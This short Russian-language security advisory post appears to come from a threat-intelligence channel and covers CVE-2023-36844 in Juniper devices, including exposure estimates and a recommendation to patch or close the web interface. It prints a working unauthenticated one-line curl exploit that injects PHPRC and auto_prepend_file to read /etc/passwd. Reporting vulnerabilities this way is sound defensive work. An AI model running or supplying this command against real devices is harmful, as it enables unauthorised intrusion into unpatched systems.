Предыстория: 28 августа эксплоит впервые опубликовала компания watchtowr. Массовая атака устройств была затруднена тем, что созданный эксплоит работал не на всех системах.
18 сентября (вчера) опубликовали универсальный 1-line RCE без авторизации для атаки этих устройств, с помощью 1 команды curl:
curl -ik "https://IP/" -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0' --ciphers DEFAULT@SECLEVEL=1
По оценкам shodan и netlas, на Российских IP публично-доступны ~300 единиц этого оборудования (и ~18000 единиц всего в мире). По оценкам автора статьи, ~80% устройств в мире остаются не запатчены.Рекомендуется обновить устройства, или отключить публичный доступ к этому веб-интерфейсу.
@scanfactory CVE-2023-36844 #juniper